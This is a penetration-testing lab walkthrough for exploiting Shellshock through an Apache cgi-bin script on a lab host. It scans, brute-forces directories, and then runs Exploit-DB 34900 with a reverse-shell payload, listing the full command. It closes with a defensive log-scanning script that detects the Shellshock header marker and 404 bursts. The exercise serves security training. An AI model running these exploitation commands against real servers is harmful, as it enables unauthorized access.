
Module 08: Web Application Penetration Testing Methodology 9

Written By AKADEMY on Thursday, July 4, 2019 | 10:12 PM

Exercise 9: Pentesting Apache Web Server Vulnerability

Scenario

A web server is a hardware/software application that delivers web pages on request to clients using the Hypertext Transfer Protocol (HTTP). This means delivery of HTML documents and any additional content that may be included, such as video, images, style sheets, and scripts. Attackers usually target vulnerabilities in the server software to gain unauthorized entry to the server.
As a penetration tester, you need to know how to identify these vulnerabilities and exploit them to gain access to the server.
In this lab, you are going to learn how to:
i. Identify Apache server vulnerability
ii. Browse the vulnerable webpage
iii. Exploit the vulnerability to gain access to the server
Lab Duration: 25 Minutes
  1. Click Kali Linux (External Network).
    If the Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
    Screenshot
  2. Type root in the Username field and click Next.
    Screenshot
  3. Type toor in the password field and click Sign In.
    Screenshot
  4. In this lab, we are going to perform pentesting on a machine with IP Address 172.19.19.19.
  5. Let us begin by performing a Nmap aggressive scan on the target machine.
    Type nmap -T4 -A 172.19.19.19 and press Enter. This will initiate the scan as shown in the screenshot below:
    Screenshot
  6. From the scan result, only one open port (80) is reported on the machine, which suggests that a website is deployed on the web server.
    Screenshot
  7. Now, launch a web browser, type http://172.19.19.19 in the address bar and press Enter.
    This displays the default Apache web server page.
    Screenshot
  8. Now, we shall brute force directory and file names on the web server using Dirbuster.
    To do so, switch to the command line terminal, type dirbuster, and press Enter.
    This launches the Dirbuster application.
    Screenshot
  9. Type http://172.19.19.19 in the Target URL field and click Browse.
    Screenshot
  10. The directory listing window appears. Navigate to /usr/share/dirbuster/wordlists, select directory-list-2.3-medium.txt and click Select List.
    Screenshot
  11. Once you select the list, click Start to begin the directory brute force attack.
    Screenshot
  12. Dirbuster begins the brute force attack against the web server and displays the results under the Scan Information tab.
    Click Results - List View tab to view the results in list format.
    Screenshot
  13. You will observe that there is a /cgi-bin/ directory holding a file named profile.
    Screenshot
  14. To view the contents of the file, right-click on /cgi-bin/profile and click Open In Browser.
    Screenshot
  15. It is observed that the profile page exists in the /cgi-bin directory.
    Screenshot
  16. Based on the information obtained, we shall now search for exploits related to Apache 2.2.22 and cgi-bin together.
    Searching Google (from the local machine) for a suitable exploit, the first result is Exploit-DB/SearchSploit ID 34900, which exploits the Shellshock vulnerability.
    Screenshot
  17. Click the Stop button in the Dirbuster window to stop the directory brute force.
    Screenshot
  18. Close the Dirbuster application.
    Screenshot
  19. Now, we shall copy the exploit with Exploit-DB/SearchSploit ID 34900 to the root folder using SearchSploit.
    To copy it, type searchsploit -m 34900 in the command line terminal and press Enter.
    This copies the exploit to the root folder.
    Screenshot
  20. We shall now read the Python script to view the exploit usage/PoC.
    To view it, type leafpad 34900.py in the command line terminal and press Enter.
    Screenshot
  21. The Python code appears in the Leafpad text editor. Observe the Example section to view the usage.
    In this lab, we will be providing the lhost, rhost, lport, payload and pages options to the exploit.
    Screenshot
  22. Type python 34900.py payload=reverse rhost=172.19.19.19 lhost=172.19.19.7 lport=4455 pages=/cgi-bin/profile in the command line terminal and press Enter.
    Screenshot
  23. Once you run the Python script, it exploits the vulnerability and returns a shell as shown in the screenshot below, indicating that the Shellshock vulnerability has been successfully exploited.
    Screenshot
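The exploit above works because Apache's CGI handler copies request headers into environment variables of the spawned process (for example HTTP_USER_AGENT), and a vulnerable bash treats an environment value beginning with "() {" as a function definition and executes what follows it. On the defending side, that same marker is the signature to hunt for in access logs, and the noisy directory brute force from steps 8-13 leaves its own trace as a burst of 404 responses from one client. The following Python script is an added example, not part of the lab or of the 34900 exploit: it parses Apache combined-format log lines, flags requests carrying the Shellshock marker in the User-Agent or Referer header, and lists clients that produced an unusual number of 404s. The log lines are constructed for the example; the IP addresses and timestamps are invented.

```python
import re
from collections import Counter

# Constructed sample Apache combined-format access log (not captured from the lab).
# Line 3 carries the Shellshock marker "() {" in the User-Agent header, aimed at
# the /cgi-bin/profile script; lines 4-6 look like a directory brute force.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Jul/2019:22:10:01 +0000] "GET / HTTP/1.1" 200 3525 "-" "Mozilla/5.0"
10.0.0.5 - - [04/Jul/2019:22:11:14 +0000] "GET /cgi-bin/profile HTTP/1.1" 200 211 "-" "Mozilla/5.0"
10.0.0.5 - - [04/Jul/2019:22:12:30 +0000] "GET /cgi-bin/profile HTTP/1.1" 200 211 "-" "() { :;}; /bin/true"
10.0.0.8 - - [04/Jul/2019:22:13:02 +0000] "GET /admin HTTP/1.1" 404 290 "-" "Mozilla/5.0"
10.0.0.8 - - [04/Jul/2019:22:13:03 +0000] "GET /backup HTTP/1.1" 404 290 "-" "Mozilla/5.0"
10.0.0.8 - - [04/Jul/2019:22:13:04 +0000] "GET /test HTTP/1.1" 404 290 "-" "Mozilla/5.0"
"""

# Apache "combined" LogFormat: client, identd, user, [time], "request", status, size, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# An exported bash function definition starts with "() {"; any header value that
# begins this way is the tell-tale of a Shellshock attempt against a CGI script.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of tags that apply to one parsed log entry."""
    tags = []
    if SHELLSHOCK_RE.search(entry["ua"]) or SHELLSHOCK_RE.search(entry["referer"]):
        tags.append("shellshock-pattern")
    if entry["path"].startswith("/cgi-bin/"):
        tags.append("cgi-request")
    return tags


def scan_log(text):
    """Return one alert per request that carries the Shellshock marker."""
    alerts = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue  # skip lines that are not in combined format
        tags = classify(entry)
        if "shellshock-pattern" in tags:
            alerts.append({"ip": entry["ip"], "ts": entry["ts"],
                           "path": entry["path"], "tags": tags})
    return alerts


def burst_404(text, threshold):
    """Return the sorted list of client IPs that produced at least `threshold` 404 responses."""
    counts = Counter()
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is not None and entry["status"] == "404":
            counts[entry["ip"]] += 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print("ALERT", alert)
    print("404 burst from:", burst_404(SAMPLE_LOG, 3))
```

Run against a real access.log by replacing SAMPLE_LOG with the file contents; the 404 threshold should be tuned to the site's normal error rate, since three misses in a row from one client is only a sensible cut-off for this constructed sample. Because the underlying flaw is in bash rather than in Apache, the fix is an updated bash package, with mod_cgi disabled wherever CGI scripts are not actually needed so that request headers never reach a shell at all.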
In this lab, you have learned how to:
i. Identify Apache server vulnerability
ii. Browse the vulnerable webpage
iii. Exploit the vulnerability to gain access to the server